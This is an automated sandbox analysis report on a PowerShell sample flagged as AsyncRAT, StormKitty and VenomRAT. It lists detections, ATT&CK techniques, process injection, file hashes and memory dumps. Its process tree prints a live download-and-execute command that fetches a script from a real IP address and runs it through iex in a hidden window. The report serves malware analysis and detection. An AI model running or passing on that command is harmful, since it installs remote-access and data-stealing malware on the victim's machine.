asyncrat | ae7811c08d45da31fecb2a31c6491459765667f12bc187abaf40db75755e4b1a

Analysis

max time kernel
94s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02/01/2025, 15:41

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

malicious_script_1.ps1
Size

2KB
MD5

a19cff86bcb8ba356ca034582a53f870
SHA1

d9a1cf4e9125ab420ebb614f67cb81c6efed1afb
SHA256

ae7811c08d45da31fecb2a31c6491459765667f12bc187abaf40db75755e4b1a
SHA512

4c5e9fb74d890d1b69f1ebc2fc5daae20229f69bee3f4a1e26b8f9465812f39555de5e15dcbda7b1fc3a6c6042dca05d57b4591cd2f545935d8d5e4a75d4e9a6

Score

10^/10

asyncrat stormkitty venomrat discovery execution rat stealer

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/2236-58-0x0000000000400000-0x0000000000704000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

VenomRAT 1 IoCs

Detects VenomRAT.

rat

resource	yara_rule
behavioral2/memory/2236-58-0x0000000000400000-0x0000000000704000-memory.dmp	VenomRAT

Venomrat family
venomrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	908	powershell.exe
15	2016	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
908	powershell.exe
2016	powershell.exe

Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1968	Package.exe

Loads dropped DLL 1 IoCs

pid	Process
1968	Package.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2016 set thread context of 2236	2016	powershell.exe	93

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4980	1968	WerFault.exe	86

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Package.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
908	powershell.exe
908	powershell.exe
908	powershell.exe
908	powershell.exe
2016	powershell.exe
2016	powershell.exe
2236	RegAsm.exe
2236	RegAsm.exe
2236	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	908	powershell.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	2236	RegAsm.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1968	Package.exe
1968	Package.exe
1968	Package.exe
2236	RegAsm.exe

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 908 wrote to memory of 4700	908	powershell.exe	85
PID 908 wrote to memory of 4700	908	powershell.exe	85
PID 4700 wrote to memory of 1968	4700	cmd.exe	86
PID 4700 wrote to memory of 1968	4700	cmd.exe	86
PID 4700 wrote to memory of 1968	4700	cmd.exe	86
PID 1968 wrote to memory of 4564	1968	Package.exe	87
PID 1968 wrote to memory of 4564	1968	Package.exe	87
PID 1968 wrote to memory of 4564	1968	Package.exe	87
PID 4564 wrote to memory of 2016	4564	cmd.exe	89
PID 4564 wrote to memory of 2016	4564	cmd.exe	89
PID 4564 wrote to memory of 2016	4564	cmd.exe	89
PID 2016 wrote to memory of 4260	2016	powershell.exe	91
PID 2016 wrote to memory of 4260	2016	powershell.exe	91
PID 2016 wrote to memory of 4260	2016	powershell.exe	91
PID 4260 wrote to memory of 1988	4260	csc.exe	92
PID 4260 wrote to memory of 1988	4260	csc.exe	92
PID 4260 wrote to memory of 1988	4260	csc.exe	92
PID 2016 wrote to memory of 2236	2016	powershell.exe	93
PID 2016 wrote to memory of 2236	2016	powershell.exe	93
PID 2016 wrote to memory of 2236	2016	powershell.exe	93
PID 2016 wrote to memory of 2236	2016	powershell.exe	93
PID 2016 wrote to memory of 2236	2016	powershell.exe	93
PID 2016 wrote to memory of 2236	2016	powershell.exe	93
PID 2016 wrote to memory of 2236	2016	powershell.exe	93
PID 2016 wrote to memory of 2236	2016	powershell.exe	93

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\malicious_script_1.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:908
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4700
- - C:\Windows\Temp\Package.exe
    C:\Windows\Temp\Package.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1968
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4564
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2016
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lb1mkv33\lb1mkv33.cmdline"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4260
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB7A7.tmp" "c:\Users\Admin\AppData\Local\Temp\lb1mkv33\CSCF34010AEBF874943A8FB93B5343FA1.TMP"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1988
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2236
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 760
      4⤵
      Program crash
      PID:4980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1968 -ip 1968
1⤵
PID:2396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
042323759662130763b90102081537f5

SHA1
3cdbc496f7e7a1c512a808fbbe88e7f724b04153

SHA256
5820f07295975657fc430bb9a7e3f75849ac3b0def9b4edba24d5105e5eed61e

SHA512
6ee211d6264ab0ec505d6dbfb57d4778dce7818280c71dc6df58d2d051276242b6ea28615b7dd45f9dec0153b6d2aac5949aba1ee87f73f4bf1905f3e082070f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB7A7.tmp

Filesize
1KB

MD5
51835a0a75b4217de4d755d451e689ba

SHA1
4b19b91cea3cfd7aecf3560bacce8760dcafbe13

SHA256
0639dd68e2e76eeae155c5515771e7a48a3c67f740aa891e056e7e9ffc94cc56

SHA512
eed68b8bff8b9dd4da640df9874f03ca8cde7d007ff515bc01d90acb77cd06401859b6a7b7599e3e96c54ea1bd03373a85c0318492f42c19be0ba60fe73dccf9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u33g4apb.kr4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\lb1mkv33\lb1mkv33.dll

Filesize
9KB

MD5
5119b9c6a80bd335f8723af1feae5651

SHA1
925e29bb8bd932804b123a9e128f4db46fd3d5af

SHA256
d4efe005765d581e0836ef1059c7b17a8955a3375acaedec91c6f3da73c898ef

SHA512
1ed326ba566dadfe9833f1ce5bc5e804412ab527252d47f6a9e66211aa5661ca53acbd4937e8099002196e8d857c557efb69f3853c353083f635086e7a5d95bd

Download Submit
C:\Windows\Temp\IVIEWERS.DLL

Filesize
88KB

MD5
33ae2b9c3e710254fe2e2ce35ff8a7c8

SHA1
109e32187254b27e04ef18bbe1b48fad42bca841

SHA256
9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68

SHA512
2abe017e2f1d29fe789206d6483b9b33e7abd0871300d678eaba15e390d55c5e197d6cea6ea32dfdee5f65d082574adcc192a4fc0c9506bbba8ad7e957e12599

Download Submit
C:\Windows\Temp\Package.exe

Filesize
201KB

MD5
2696d944ffbef69510b0c826446fd748

SHA1
e4106861076981799719876019fe5224eac2655c

SHA256
a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a

SHA512
c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lb1mkv33\CSCF34010AEBF874943A8FB93B5343FA1.TMP

Filesize
652B

MD5
12f3276f8fec7d13a3dec7acbecd3f0e

SHA1
10b1a9361bef9d0e6910bb23556415658432d62b

SHA256
8e2bcab854075f6dc9c2acd42749dbc59c65a63f167c7c999c86756b6cf31fd1

SHA512
7c31f6eb856d19621f629ab3dafdc7cb5b452b56bf8907b16b69859f63b5805714fb4a50467c5fae388fe36dd51325244323d38a69a38873eac3d8fb21f74b0b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lb1mkv33\lb1mkv33.0.cs

Filesize
10KB

MD5
3fa79decff8805745cea8116d9bb2643

SHA1
92343c5fa2c768b964ae3a4e9136e5d7193e8558

SHA256
e6852a401b53a7af04d57aa1e4fc9621e3dffc1221534142316a27ae67e8f89c

SHA512
5c2879e59fa6609e6e87f70c5237b250a906bf7dd13a343dac9e81635b1fc91ad9374e643a306b99503c52ce9bd56554a64aa132584c732d43ee39fb17305d78

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lb1mkv33\lb1mkv33.cmdline

Filesize
204B

MD5
9171cff99dbbe41aeb037f4805d7b33a

SHA1
fb08294a1a5b51e1609a8de87189d9d782f35404

SHA256
43a666c5fd440a3fac7bfa38c3b8743edb644bc8ba7d96543f34317403bdaed7

SHA512
c34b0ac72e4a325976d8ac0ec346a090f25148b627603208fb065aaefca60eaf17f33945d7b66983ac6d40d954ff443267b094c55ae2a2470d9328bdacb3ec68

Download Submit
memory/908-11-0x00007FFE599A0000-0x00007FFE5A461000-memory.dmp

Filesize
10.8MB

Download
memory/908-0-0x00007FFE599A3000-0x00007FFE599A5000-memory.dmp

Filesize
8KB

Download
memory/908-20-0x00007FFE599A0000-0x00007FFE5A461000-memory.dmp

Filesize
10.8MB

Download
memory/908-12-0x00007FFE599A0000-0x00007FFE5A461000-memory.dmp

Filesize
10.8MB

Download
memory/908-10-0x000001BAC52B0000-0x000001BAC52D2000-memory.dmp

Filesize
136KB

Download
memory/2016-23-0x00000000029D0000-0x0000000002A06000-memory.dmp

Filesize
216KB

Download
memory/2016-25-0x0000000005080000-0x00000000050A2000-memory.dmp

Filesize
136KB

Download
memory/2016-40-0x0000000006070000-0x00000000060BC000-memory.dmp

Filesize
304KB

Download
memory/2016-41-0x00000000078B0000-0x0000000007F2A000-memory.dmp

Filesize
6.5MB

Download
memory/2016-42-0x0000000006520000-0x000000000653A000-memory.dmp

Filesize
104KB

Download
memory/2016-43-0x00000000075C0000-0x00000000075CE000-memory.dmp

Filesize
56KB

Download
memory/2016-37-0x0000000005A40000-0x0000000005D94000-memory.dmp

Filesize
3.3MB

Download
memory/2016-27-0x00000000059A0000-0x0000000005A06000-memory.dmp

Filesize
408KB

Download
memory/2016-26-0x0000000005120000-0x0000000005186000-memory.dmp

Filesize
408KB

Download
memory/2016-39-0x0000000006040000-0x000000000605E000-memory.dmp

Filesize
120KB

Download
memory/2016-24-0x0000000005270000-0x0000000005898000-memory.dmp

Filesize
6.2MB

Download
memory/2016-56-0x00000000075D0000-0x00000000075D8000-memory.dmp

Filesize
32KB

Download
memory/2236-58-0x0000000000400000-0x0000000000704000-memory.dmp

Filesize
3.0MB

Download
memory/2236-61-0x0000000005110000-0x00000000056B4000-memory.dmp

Filesize
5.6MB

Download
memory/2236-62-0x0000000004FE0000-0x0000000005072000-memory.dmp

Filesize
584KB

Download
memory/2236-63-0x0000000004FC0000-0x0000000004FCA000-memory.dmp

Filesize
40KB

Download
memory/2236-66-0x0000000005FB0000-0x000000000604C000-memory.dmp

Filesize
624KB

Download
memory/2236-67-0x0000000006380000-0x00000000066D4000-memory.dmp

Filesize
3.3MB

Download